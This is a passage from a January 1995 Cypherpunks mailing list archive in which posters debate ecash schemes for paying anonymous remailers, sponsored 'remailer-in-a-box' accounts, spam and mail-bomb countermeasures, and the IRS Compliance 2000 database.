of real cash is based on the possibility of converting it into real things), a structure that operates outside the law makes that value doubtful. A large-scale rollout of ecash for the average Netscape user (and the people that service them) is going to need all the legitimacy it can muster. Perhaps, though, we can start small, and allow the forces of nature (greed, envy and, with a bit of luck, sloth) to take their course and scale a small scheme into a thriving e-economy. What I have in mind is a service that provides estamps (you knew there had to be an 'e' in there somewhere, didn't you) for use with remailers. Jo Anonymous buys stamps, sticks them on her messages, and the anon-remailers collect them. The remailer ops then get to cash the stamps in for actual money, so they can pay their ISPs and lawyers. At the heart of the scheme is a genuine (micro) ebank [a uebank?]. But, to avoid problems with offering securities to the public (and the SEC hassles etc), the ebank only sells estamps (little bits of ecash) to estamp- vendors. The estamp-vendors sell the stamps (with a mark-up?) to the public. [Perhaps using this new Netscape/Mastercard tie-in.] Because the estamp- vendors are only selling stamps (you can tell by the beautiful stamp-like gif-icons the vendor's Web page uses...) the SEC doesn't become involved. [I'm relying on the fact that the numbers involved are really small, and that the estamps *are* being sold for the purposes of postage. Perhaps the ebank and the vendor should be based off shore...] This scheme breaks the credibility issue into two -- a large number of people (anonymous remailer users) have to be convinced of something relatively trivial (that the remialer will accept the stamps); a small number of people (anonymous remailer operators) have to be convinced of something relatively important (that the stamps are exchangeable for cash). If the remailer operators are sufficiently involved in the scheme, this should work. One type of scalability comes when EITHER A. Someone sets up as a Data Haven token vendor (the tokens being bought from the ebank as slightly larger bits of ecash), and data haven operators start to accept the Tokens, in the knowledge they can swap them for real money; OR B. Data Haven operators start to accept estamps for their services, because they can swap them for cash; OR both. [The first scenario obviously disguises the appearance of ecash as a medium of exchange for a bit longer.] Another type of scalability comes when other people start uebanks, which then issue their own estamps/tokens/ecash to estamp/token vendors. If the new uebanks are as (provably) secure as the original(s), the uebanks could agree to clear each others' ecash and settle up at the end of the day (or some global equivalent - eg 12am GMT) using some kind of netting system. As long as everyone played nice at the beginning (all the remailer operators declared their estamp income etc ;-) the uebanks could go legit: and by backing their submissions to regulators with a proven record of service (no need to stress that the remailers were *anonymous*), by wearing Al Gore t-shirts and garbling about the I-way and electronic town halls, and by not letting Tim May and his contract killers near the place, it might just work. On the other hand, if the system is working well enough, there may be no need to go legit. (Although if I was an ebank operator I would be wary about entering into netting arrangements with an ebank the SEC etc could close down). [But is netting needed with online clearing? Perhaps this would only be useful across currencies...] With the ebanks in appropriate jurisdictions, operating in grey rather than obviously black areas (it is not so much that this stuff is being offered to the public as that the public is going out to *find* this stuff), with a proven track record in ponying up the cash, and with the approval of really cool people who get on the cover of Wired, Robin Public may not *need* any more assurance to par- ticipate in the e-economy. What R.P. *will* need is products. Most of the attempts at net-commerce I've seen concentrate on offering things that can be delivered to people, either physically (so that the Compuserve Electronic Mall is basically a mail order catalogue) or electronically (hence the rather sketchy descriptions of anonymous markets, usually falling back on the idea that, because this is the Information Age, consulting is the root of all value...), to be consumed now (this tin of coffee, that movie-on-demand, the other set of nanotech plans). But of course a lot of people (not, unfortunately, myself :-) have significant amounts of property that they do not consume right away. The possibility of anonymous investment (through eg anon corps) offers huge scope for the development of the e-economy. [I'll mention one statistic -- according to tax haven experts (Ginsberg, Spitz), in 1989 50% of all money processed internationally goes through tax havens.] After all, a capitalist economy (even an anarcho-capitalist economy) is built by capitalists, not wage slaves. More later (unless you plead real hard...) Cheers, David From rishab at dxm.ernet.in Fri Jan 20 14:23:56 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Fri, 20 Jan 95 14:23:56 PST Subject: The Remailer Crisis Message-ID: Tim urges recently that we need to do something about the "remailer crisis." I remember Sameer once mentioning that he could set up remailer-in-a-box accounts for possibly anonymous 'sponsors' who'd be the legal owners therefore indemnifying Sameer (the tolerant sysadmin) of responsibility. I know he allows 'remail-to-yourself' blind-server accounts for $10 / meg or something. That's probably a bit expensive for a sponsor of a public remailer (any stats on average remailer traffic?). I never did here any more from sameer or anyone else about remailers-in-boxed-accounts. I for one would be willing to 'sponsor' a remailer account on any system with a small fee - I can't run my own as my private site looks at the world through PPP. I suggest that 'sponsored' remailers are a better way of making remailers economically viable for people like Sameer, who are the real, if not nominal, administrators. Though I hardly use remailers, those who do would probably make better (and more easily executed) use of their money if they sponsor remailer accounts on Cypherpunk ISPs like c2, rather than pay a (truenamed, legally vulnerable) operator for any single remailer. Sameer's blind-server code can come in use to make any link between the sponsor and her sponsored account very hard to detect. The advantages of sponsoring remailer-site operators to create remailing accounts, rather than pay an individual remailer operator, are many: 1. innocent until proven guilty - presumably sponsors do use remailers a lot; but not necessarily. So the payment transaction can be via truename, rather than via some complicated anonymous means, and still leave the sponsor unimplicated 2. legal - an operator of a single remailer is vulnerable - technically, if not root, and legally otherwise. an administrator of a Cypherpunk ISP is not, and does not have the legal right to monitor a customer's traffic, and with blind-servers even detailed logging don't lead back to the owner of an account, the sponsor, from any _specific_ remailer (though a pool of sponsors exist for a pool of remailer account) 3. technical - it's not possible to ban a single remailer, as they may be _many_ on a site. If the site is much more than just remailers, it's not really possible to ban the entire site. 4. traffic analysis - more remailers addresses will make traffic analysis harder, and chaining more fun - you could chain through multiple accounts on a single site with little loss in reliability (though you'll still want to go through more sites) 5. remailer explosion - more reliable remailers (due to the '-in-a-box', more users, wider distribution Comments? ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Fri Jan 20 14:37:02 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Fri, 20 Jan 95 14:37:02 PST Subject: Netherlands crypto ban? Message-ID: What's the update on the move to ban private crypto in Holland? Last I remember there were trial balloons, but nothing happened. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From pstemari at erinet.com Fri Jan 20 15:20:42 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Fri, 20 Jan 95 15:20:42 PST Subject: IRS to keep unreviewable secret dossiers on US citizens Message-ID: <9501202311.AB09922@eri.erinet.com> At 12:44 PM 1/20/95 CST, xpat at vm1.spcs.umn.edu wrote: >Excerpts from : St Paul Pioneer Press, Jan 29, 1995 > >"IRS plans to collect more data on individuals to nab tax cheats" [...] Here's the text from the recent EPIC annoucement on this--it covers the exemption the IRS is claiming from the FOIA in a bit more detail (sorry if people have already seen this): ======================================================================= [6] IRS Initiates Massive New Database ======================================================================= On December 20, the Internal Revenue Service announced in the Federal Register that it was planning a new database to monitor compliance of taxpayers in a project entitled Compliance 2000. The database would contain information on all individuals in the U.S. who conduct certain financial transactions and would be segmented by different criteria: Any individual who has business and/or financial activities. These may be grouped by industry, occupation, or financial transactions, included in commercial databases, or in information provided by state and local licensing agencies. The new database will combine private and public sector databases in a single searchable entity. A number of federal financial databases from the IRS will be enhanced with state, local and commercial sources. The Federal Register notice describes the non-tax databases: Examples of other information would include data from commercial databases, any state's Department of Motor Vehicles (DMV), credit bureaus, state and local real estate records, commercial publications, newspapers, airplane and pilot information, U.S. Coast Guard vessel registration information, any state's Department of Natural Resources information, as well as other state and local records. In addition, Federal government databases may also be accessed, such as, federal employment files, federal licensing data, etc. Finally, even though the proposed system would use frequently inaccurate "commercial databases" such as direct marketing records, taxpayers would not be able to review their records to ensure that they are accurate and up to date: "This system is exempt from the access and contest provisions of the Privacy Act." EPIC is filing comments asking the IRS to reconsider its use of commercial databases and to ensure that there are greater safeguards on the collection and use of personal information. A copy of the Federal Register notice is available at cpsr.org /cpsr/privacy/epic/IRS_compliance_2000_notice_txt Comments on the proposed system must be received by January 19, 1995, and sent to Office of Disclosure, Internal Revenue Service, 1111 Conn. Ave, NW, Washington, DC 20224. EPIC's Comments are available at cpsr.org /cpsr/privacy/epic/epic_irs_compliance_2000_comments.txt --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From tcmay at netcom.com Fri Jan 20 15:20:55 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 20 Jan 95 15:20:55 PST Subject: The Remailer Crisis In-Reply-To: Message-ID: <199501202316.PAA19895@netcom8.netcom.com> rishab at dxm.ernet.in wrote: > Tim urges recently that we need to do something about the "remailer crisis." > > I remember Sameer once mentioning that he could set up remailer-in-a-box > accounts for possibly anonymous 'sponsors' who'd be the legal owners therefore > indemnifying Sameer (the tolerant sysadmin) of responsibility. I know he allows > 'remail-to-yourself' blind-server accounts for $10 / meg or something. That's > probably a bit expensive for a sponsor of a public remailer (any stats on .... I of course agree with everything Rishab just said, because I've made these points repeatedly over the last year or so. The "remailer-in-a-box" was even my coinage, though I make no claims to working on it more than just proposing some ideas. I mention this because I sense a fair amount of frustration by many of us that the same ideas keep coming up, keep getting general support, but don't move along further. I've certainly felt this, and I know others have, too. (I sometimes think that nearly all messages here are just skimmed by the readers, so the same stuff keeps bubbling up over and over again.) Yet I'm not pointing a finger at the remailer operators or anyone else. The problems are systemic, related to why things don't get done. In any case, I strongly urge--and have several times now--that the act of owning or operating a site be explicity disconnected from the act of having an account that does remailing. Sites/Owners that allow remailing accounts ARE NOT THE SAME AS accounts/owners that actually do the remailing! Further, there is no legal requirement (U.S.) that accounts be "identifiable" publically--and probably no legal requirement that accounts be identifiable at _all_. Thus, I could buy (Rishab's "sponsor") a remailer account on foo.bar for some amount of money, paid with paper currency sent to the remailer (just to help defray costs, not as a sophisticated "paid remailer" scheme). (And if charges of abuse, or legal letters from the Church of Aptical Foddering, cause the site owner to "shut down" account remailer73 at foo.bar, then a new account, remailer121 at foo.bar can be instantiated immediately. Nothing illegal about this, unless the site itself is (somehow) declared to be a contributory nuisance or somesuch.) For reasons which should be apparent to all, having my name, or any other name, attached to a remailer (e.g., "Tim-Remailer at foo.bar") could invite deliberate attacks, spams, etc. Better to have remailers have no such flags or invitations, a point several of you have also commented on (in terms of picking domain names that are not inflammatory or that will not trigger local scrutiny). Like Duncan F., I will be willing to sponsor or buy some remailer accounts. How many I sponsor will depend on the price, features, reliabillity, etc. (Please do not post "Hey, I'm willing to do this, so send me your $100 now." messages....for obvious reasons.) I am waiting for such services to be actually, formally, solidly announced, not just casual remarks that it might be possible. And of course the software should be "ready to wear," port-a-potty, so that the remailer account owner does nothing more than pay for the account. (Aside: I strongly recommend that some emergent naming conventios be discussed. For example, the "remailers-in-a-box" may need to be "no frills" remailers, with no errors reported to the sender, no help to those who send the wrong instructions, no hand-holding, and even _no further contact_ between those who sponsored/bought the accounts and the account itself! This could be marked as "anon-nf-137 at foo.bar," meaning, an anon account, no frills, number 137 (of many more, hopefully). And so on.) And it will also depend on site reliability, uptime, etc. One site I would otherwise be tempted to sponsor a remailer account on recently took 5 days to forward a test message, so the problems are apparent. (I believe remailer operators need to _promote_ their sites, by citing uptimes, features, policies....but this is another one of those ideas that keeps coming up over and over again, from various people.) The "crisis" I am talking about is that we are down to a handful of sites, down from nearly 20 at one time, and with no apparent upward trend in numbers. Separating the act of having the courage/dedication to allow remailers from the act of operating remailers out of accounts is the key. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From nzook at bga.com Fri Jan 20 15:34:06 1995 From: nzook at bga.com (Nathan Zook) Date: Fri, 20 Jan 95 15:34:06 PST Subject: Spam Busters! Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Yeah, the numbers should be higher. This was just a hypothetical! nzook at bga.com said: > There is little, if anything, we can do to stop a chained, PGP'ed mail > bomb, "This is mail bomb number XXX. Boom!" It is therefore in our best > interest to not encourage children to send such messages in such a way. I > believe Homer's message was erroneous for this reason. People, please! Before critisizing a method, look at the threat model! I plainly stated that my method was not intended to deal with real trouble. tcmay: "The From: line is notoriously misleading". But it still gives enough that we need remailers in the first place, right? The "From:" was a token. It wasn't meant as a literal. For id'ing postmaster, all you need is the xx.xx.xx.xx, right? jalicqui "Unless your remailer was the terminal remailer for a significant number.." But in a serious spam/mailbomb attack, someone would _have_ to get a bunch, right? With the changing session keys, and a chain, the best we could hope for would be to stop it on its way out. (or use for padding ;-) Incidently, a per/customer volume limit would also control the binaries. Since we have little hope of id'ing the true originator, we might have to limit a site. (bad) OTOH, if someone tried to send binaries, only to find that they couldn't get more than 1M out an hour, they would probably give up & go somewhere else. We might also hit the chained pgp bomber this way, as the messages would likely be fairly large? XXX But this all misses a point that I would like to stress. We are in what the military refers to as "low-intensity combat". Right now, we don't have a continuous stream of spam-bombs floating through our systems. (Well, we did, but jp shut down :-(( ) Right now, we (other than PRZ) don't have serious legal troubles. Right now, our remailers are too weak to be a significant problem to the TLAs (any more than a forged From:). The way to win a low-intensity battle is to avoid escalating unless you are sure you can win. Eventually, we will have to standardize packets. Eventually, we will have to employ very sophisticated techniques to deal with spam-bomb. But maybe we don't do that today. Maybe we do just enough to catch a bunch of the most juvenile. Then the next bunch is smarter. Then we catch them. We keep going. You see, I doubt that we can take on a spammer that knows the net as well as anyone here. But I don't doubt that word can get out that the remailers nail spammers. Of course, we risk becoming the latest challenge to the juvenile, but I think that this is far less likely than it appears at first because we are, after all, "really cool". My suggestion is to avoid, for as long as possible, letting on to _anyone_ just how sophisticated our systems are, just how much can be done, until we are sure we can win the unavoidable battles. XXX This also strongly points to per-line blocking of remailers. Since the necessary steps to catch a sUPer bomber appear to be impossible/ impractical, we must offer annon-blocking for those poor souls that request it. Perhaps annon-block for a month at a time. This is part of that PR that we need to watch. To put it another way, if our services make it easy(er) for someone to engage in an activity that we oppose, and that can hurt (subjective) someone else, we are facing a moral responsiblity for our actions. We should attempt to fulfill that responsibility. I believe that the phone company even allows people to change numbers for free if they are receiving harassing calls. And we want to be better though of than the phone company, right? XXX BTW, do you have to be a remailer operator to be on the list? If not, I'ld like to know how to subscribe... Finger or request keyserver for PGP 2.6.2 (tm) key. PGP<->Mail/News installation incomplete. Factors for modulous are not proven primes. Key may be far weaker than expected. Encode at your own risk. Key ID: 14712B4D 1994/12/26 Nathan H. Zook Key fingerprint = 44 B3 D8 66 3D 55 1E 2E F8 92 22 A6 33 8C DE 24 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLyBfUHmgMs8UcStNAQE7Ygf/Wg5+hKErgpqi+4J7jOAw97AitUnYn+z+ QJqAw4ar6hQEY/taC6ru5S8YjKYHwmXdR7n7YjSFjEy8aYwXSr4SaALICNhQsyrU jcSuaMY0oUN2obYV6TxYtdVWaQVF9XBqW/8AlIcs+ZF4Yi7gqUdgf4aApuapW14e drVi6PgV5ccg8a+wGBCdJhDy5AK0BJRtxUxtLDeb+MkaTOfk/ylLfBdbFV1iK7Ek qDmpAZdd+FpwKoqBTm+jbCa/kemwFN5touLeLijRWjEuoqFK0x/YYRYsAjJUNqu/ Qt6YWqvat8t7UYlTauVsQ/9XJNxADxmWlrKaaQTxmsHrobq0h4s+RA== =ykck -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Fri Jan 20 15:55:31 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 20 Jan 95 15:55:31 PST Subject: Why emoney? Why not a web of debt? Message-ID: <199501202354.PAA13275@jobe.shell.portal.com> [summary -- digital silk road along a web of debt-trust] Umm... money is not anything mystical -- it is just a convienient way to trade and settle debts. It was invented to solve the hassels of trading a pound of butter, for a box of eggs, that for a tightly woven basket, and finaly that for the gun you wanted in the first place. Yuch! accounting!! But electronic computers are good at checking out these kinds of chains automatically. Suppose there were a web of debt-trust. Each person would indicate the other people who's iou's they will accept (and the amount they would be willing to take). Thus I might take (up to $10 of) Jo's, who might take Carol's who might take Terry's, etc. To buy something from me online, you will need to produce an IOU from Jo, Carol or Terry. I would hand it to Jo for verification. Jo would accept it or reject it (perhaps after talking to some other folks online). If it were a CarolIOU, or a TerryIOU I would insist Jo trade it for a JoIOU. All the details could be hidden behind a nice little GUI. Jo and I would continuously balance the books between us by trading JoIOUs for NoybIOU's. After a while one of us might well end up with enough extra IOUs that we want to get paid. Perhaps the other would perform services directly, or pay FRN's or gold, or whatever. If one of my friends wasn't able run an online IOU server, I could probably trade things with my friend for IOU's. Not that I'm running a bank or any thing. With out every one being on line though I don't see an easy way to prevent double spending. Is there a offline multiple exchange token system invented yet? Noyb From jrochkin at cs.oberlin.edu Fri Jan 20 16:32:04 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 20 Jan 95 16:32:04 PST Subject: Why emoney? Why not a web of debt? Message-ID: At 6:54 PM 01/20/95, anonymous-remailer at shell.portal.com wrote: > But electronic computers are good at checking out these kinds of >chains automatically. Suppose there were a web of debt-trust. Each >person would indicate the other people who's iou's they will accept >(and the amount they would be willing to take). Thus I might take (up >to $10 of) Jo's, who might take Carol's who might take Terry's, etc. > > To buy something from me online, you will need to produce an IOU >from Jo, Carol or Terry. I would hand it to Jo for verification. Jo >would accept it or reject it (perhaps after talking to some other >folks online). If it were a CarolIOU, or a TerryIOU I would insist Jo >trade it for a JoIOU. All the details could be hidden behind a nice >little GUI. Certainly, that's what money is after all. Pretty much. But how are you going to transfer these IOUs electronically in a way that is relatively fraud-proof? Digital money. Ecash. When we say "ecash", we're talking about what Chaum was writing about in whatever paper, what Schneier describes protocols for in AC. Maybe the ecash is redeemable in US dollars, or maybe it's redeemable for 10 units of service from Jon Smith, but an ecash protocol is what you are going to use to transfer and issue those digital certificates of value, whatever the value represents. And of course, if you want to use these certificates of value anonymously, which is what is required to pay for an anon remailer, there are some slightly more stringent requirements. The right kind of ecash protocol can still handle it. But Carol probably shouldn't be paying for a remailer in CarolBucks (or CarolIOUs, whatever), at least not unless Carol is such a big spender that CarolBucks are in wide circulation and used by lots of people other then Carol. Which I guess is possible in your system. A pseudo-anarchist non-state-supported debt system would work fine, but you still need a mechanism to transfer your certificates of value, whether they stand for ten U.S. dollars, or 10 hours that Jon Smith will work mowing your lawn. And another way to look at it is that you are just proposing an ecash system where every person issues their own ecash, instead of just a few central banks doing it. There are advantages and disadvantages to that sort of thing, and it might be something interesting to think about, but you ultimately aren't going to be able to do it over a computer network without ecash. Ecash is the way you represent value certificates in digital form, pretty much. From jya at pipeline.com Fri Jan 20 16:57:45 1995 From: jya at pipeline.com (John Young) Date: Fri, 20 Jan 95 16:57:45 PST Subject: Purshottam Message-ID: <199501210057.TAA29696@pipe2.pipeline.com> >----- Forwarded message (Andrew Purshottam ) -----< Dear Mr. Purshottam, Mail to boings. From jackr at dblues.engr.sgi.com Fri Jan 20 17:19:40 1995 From: jackr at dblues.engr.sgi.com (Jack Repenning) Date: Fri, 20 Jan 95 17:19:40 PST Subject: Why emoney? Why not a web of debt? In-Reply-To: <199501202354.PAA13275@jobe.shell.portal.com> Message-ID: <16152.790650879@dblues.engr.sgi.com> Recently, someone wrote: But electronic computers are good at checking out these kinds of chains automatically. Not that good. Loss of connectivity, limited bandwidth, and cumulative table size would all make this impractical very quickly, I think. From adamfast at seanet.com Fri Jan 20 17:22:20 1995 From: adamfast at seanet.com (Adam Feuer) Date: Fri, 20 Jan 95 17:22:20 PST Subject: Why emoney? Why not a web of debt? In-Reply-To: Message-ID: Noyb asks if there are offline methods of IOU-token exchange... well, one way of doing it is LETS, the Local Exchange Trading System-- a non-computerized way of exchanging value in a community. it doesn't exactly use money. there are thousands of LETS's worldwide, i've never used one and don't know how they work in practice, tho i'd like to find out! they seem like a good idea. it seems like the ideas could be extended to the net-- there seems to be a synergy with digital signatures, etc. a good place to find info about LETS is: LETSystems - the Home Page -adam adamfast at seanet.com From sameer at c2.org Fri Jan 20 17:43:18 1995 From: sameer at c2.org (sameer) Date: Fri, 20 Jan 95 17:43:18 PST Subject: Remailer In a Box available for beta testing Message-ID: <199501210142.RAA28133@soda.CSUA.Berkeley.EDU> I finally got annoyed with Tim clamoring for a Remailer in a Box, so I set it up just now... I just wrote it so there may be some problems I haven't gotten rid of yet. If you want to run a remailer on c2.org: 1) Sign up for a shell account on http://www.c2.org/services/signup.html 2) Log into your account (via dialup [510-549-1383] or telnet [c2.org]) once it has been created. (within a day.. I'll automate account creation so it gets made within an hour soon, but right now I am doing it manually.) 3) If you wish, you can setup a .forward file to point to mailfilters or to another account. 4) Run the program /usr/local/lib/boxed-remailer/install_remail. The remailer will be installed, and non-remailed mail will be acted upon according to how the account was setup before you ran the program. 5) Answer the questions, they should be pretty simple. Once an account is created there is a one week free grace period. If you'd like to continue the account you can pay for it. If you have problems and suggestions, make sure you mail me, and I'll fix it. This is still in beta testing, so if you have problems I won't disable the account waiting for payment until the problems are fixed. $10 for one month, $27 for 3 months, $45 for 6 months. -- sameer Voice: 510-841-2014 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383 http://www.c2.org (or login as "guest") sameer at c2.org From greg at ideath.goldenbear.com Fri Jan 20 17:45:41 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Fri, 20 Jan 95 17:45:41 PST Subject: Remailers-in-a-box Message-ID: <199501210129.AA01692@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Tim May wrote: > I am waiting for such services to be actually, formally, solidly > announced, not just casual remarks that it might be possible. And of > course the software should be "ready to wear," port-a-potty, so that > the remailer account owner does nothing more than pay for the account. In this model, who deals with mailbombs/spams/requests for address blocks? It is this sort of administrivia (plus the threat of liability) that makes running a remailer troublesome, not a lack of someone's $20/month. I think it's disingenuous to say that "X pays the bills for the network link; X purchased the hardware and keeps it running; the box is in X's house/office; X is the person who reads complaint mail and responds (or fails to); but because Y sends X $20/month, the remailer (and attendant liability for its mis/use) belongs to Y." I realize that there's a certain formal logic to it, but I don't think that anyone - not courts, and not the world-in-general - is going to pay attention to that formalism when it's clear that a machine essentially under the control of X is being used for 'antisocial' means. I'm seriously considering offering this sort of remailer-in-a-box thing, but there's a certain amount of hassle associated with running a remailer. It can be shifted to different parties, but it must be paid for one way or another. I guess it'd be possible to treat remailers as disposable - when one had pissed off enough people, it could be abandoned - but this lack of long-term reliability seems poor. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLyBjVX3YhjZY3fMNAQEI3QP/YdqBbhn5k4Q+NtD3zoJCG7qIfGaQqogH AFFmItuU46rFQHHSxPl+p4fNmX+32yEva04ORq28NWPKggXiXhwN+LQDshWomSU8 gXkysIPdGeogSDxP6+JxXatE81TpuCjOtbGH3KlmCNaRbB0685zBVB7Oj1O/D5it zqM9JuV8yAE= =EQY5 -----END PGP SIGNATURE----- From jamesd at netcom.com Fri Jan 20 18:23:18 1995 From: jamesd at netcom.com (James A. Donald) Date: Fri, 20 Jan 95 18:23:18 PST Subject: Why emoney? Why not a web of debt? In-Reply-To: Message-ID: At 6:54 PM 01/20/95, anonymous-remailer at shell.portal.com wrote: > > But electronic computers are good at checking out these kinds of > >chains automatically. Suppose there were a web of debt-trust. Each > >person would indicate the other people who's iou's they will accept > >(and the amount they would be willing to take). Thus I might take (up > >to $10 of) Jo's, who might take Carol's who might take Terry's, etc. On Fri, 20 Jan 1995, Jonathan Rochkind wrote: > Certainly, that's what money is after all. Pretty much. But how are you > going to transfer these IOUs electronically in a way that is relatively > fraud-proof? I believe that the point that anonymous was making is that if everyone is their own bank and their own currency issuer, then identity based cash is just as resistant to state power, and perhaps more resistant, than anonymous cash. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.catalog.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the omnipotent state. | jamesd at netcom.com From davidm at iconz.co.nz Fri Jan 20 18:25:38 1995 From: davidm at iconz.co.nz (David Murray) Date: Fri, 20 Jan 95 18:25:38 PST Subject: Why emoney? Why not a web of debt? Message-ID: <199501210224.PAA22017@iconz.co.nz> >At 6:54 PM 01/20/95, anonymous-remailer at shell.portal.com wrote: >> But electronic computers are good at checking out these kinds of >>chains automatically. Suppose there were a web of debt-trust. Each >>person would indicate the other people who's iou's they will accept >>(and the amount they would be willing to take). > >Certainly, that's what money is after all. Pretty much. But how are you >going to transfer these IOUs electronically in a way that is relatively >fraud-proof? Digital money. Ecash. [...] > And another way to look at it is that you are just proposing an >ecash system where every person issues their own ecash, instead of just a >few central banks doing it. The question of how to value ecash issued by different entities of varied credit-worthiness is an interesting one. I had been thinking along the lines of one or more centralised (but independent) credit rating agencies (a la Standard and Poors or Moodys) that one would subscribe to. Then you would value the various edollars in terms of their credit rating -- so you might sell something for $4 of CyberCash (NA) BV ecash, or $5 of FliBiNite NL ecash and so on. But of course, since ecash is worth only what you can get for it, the web of trust model, since it reflects what people will give for it, seems to reflect that underlying value much better. The best way to underpin the value of ecash is for the issuer to (credibly) undertake to convert it into real money. This gets around the problem of no one on the net making enough things you want: the old 'you can't eat cyberspace' saw. McDonalds may not accept ecash, but if a simple trip to the relevant ebank's Web page can put the price of a Big Mac in your real-money account, that is only a timing problem. [Of course, you have to come out from behind the anonymous ecash shield to do that, but that is a problem of being a real person. If you want to keep your wealth anonymous, don't buy a flash car and the latest Monet to go on sale -- invest it in an anonymous corporation.] An ebank along these lines could be set up reasonably cheaply (apart from the technical hurdles ;-), and could easily scale up as needed, and migrate to safer (taxhaven/banking secrecy) jurisdictions when turnover etc warranted it. David From rfb at lehman.com Fri Jan 20 18:59:12 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Fri, 20 Jan 95 18:59:12 PST Subject: IRS to keep unreviewable secret dossiers on US citizens In-Reply-To: <9501202311.AB09922@eri.erinet.com> Message-ID: <9501210257.AA29480@cfdevx1.lehman.com> Date: Fri, 20 Jan 95 18:11:54 EST From: "Paul J. Ste. Marie" At 12:44 PM 1/20/95 CST, xpat at vm1.spcs.umn.edu wrote: >Excerpts from : St Paul Pioneer Press, Jan 29, 1995 > . . . Comments on the proposed system must be received by January 19, 1995, Ok, let me get this straight. In nine days there will be an article which will mention that yesterday was the last day to comment on this. Cool! :-) Rick From tcmay at netcom.com Fri Jan 20 19:07:08 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 20 Jan 95 19:07:08 PST Subject: Remailers-in-a-box In-Reply-To: <199501210129.AA01692@ideath.goldenbear.com> Message-ID: <199501210301.TAA09022@netcom14.netcom.com> Greg Broiles wrote: > Tim May wrote: > > > I am waiting for such services to be actually, formally, solidly > > announced, not just casual remarks that it might be possible. And of > > course the software should be "ready to wear," port-a-potty, so that > > the remailer account owner does nothing more than pay for the account. > > In this model, who deals with mailbombs/spams/requests for address blocks? > It is this sort of administrivia (plus the threat of liability) that > makes running a remailer troublesome, not a lack of someone's $20/month. In this model the owner of the machine (who is not himself a remailer, only a seller of accounts) simply ignores all such issues of mailbombs, spams, request for address blocks. He has a form letter than says something like: "I am not the initiator of any mail bombs, spams, or illegal mail. I merely sell accounts, like private mail boxes. Some of the mail you are objecting to may have originated on my system, some may merely have passed through my system, just as mail passes through many systems from sender to receiver. If you have problems, talk to the sender, not to me. Under the ECPA I cannot even _look_ at the mail on my system, and even if it were legal, I would not." > I think it's disingenuous to say that "X pays the bills for the network > link; X purchased the hardware and keeps it running; the box is in X's > house/office; X is the person who reads complaint mail and responds (or > fails to); but because Y sends X $20/month, the remailer (and attendant > liability for its mis/use) belongs to Y." I realize that there's a > certain formal logic to it, but I don't think that anyone - not courts, > and not the world-in-general - is going to pay attention to that > formalism when it's clear that a machine essentially under the control > of X is being used for 'antisocial' means. It likely buys a couple of years of protection, though. Currently the remailer sites = remailer accounts, so they have little or no protection. I don't think "disingenuous" as very apt description. For one thing, my proposal certainly doesn't make things any _worse_ for the true remailers. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From tcmay at netcom.com Fri Jan 20 19:09:29 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 20 Jan 95 19:09:29 PST Subject: IRS to keep unreviewable secret dossiers on US citizens In-Reply-To: <9501201859.AA06028@snark.imsi.com> Message-ID: <199501210308.TAA09743@netcom14.netcom.com> Perry E. Metzger wrote: > xpat at vm1.spcs.umn.edu says: > > Excerpts from : St Paul Pioneer Press, Jan 29, 1995 > > > > Here's the kicker: "Although agency officials concede that some of > > the data collected will be inaccurate, taxpayers will not be allowed > > to review or correct it" ^^^^^^^^^^^^^^^^^^^ > > ^^^^^^^^^^^^^^^^^^^^^^^ > > So much for the FOIA. > > The privacy act and FOIA make that more or less illegal -- if they are > keeping information on you, with certain law enforcement related > exceptions they have to let you see it. The articles I've read on this new system ("Compliance 2000") make it clear that the IRS will be buying data from non-governmental entities, e.g., the direct marketing databases and the commercial credit reporting agencies. This neatly skirts the FOIA, as the FOIA cannot be used to force a private entity or corporation to reveal its own data (which, as a libertarian, I am glad of....I wouldn't want folks demanding to sift through my records, files, and dossiers). This just extends the type of "subcontracting" to nominally private entities that the intelligence community began many years ago. The corporation, "Dossiers R Us," will be the "Air America" for our age. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, 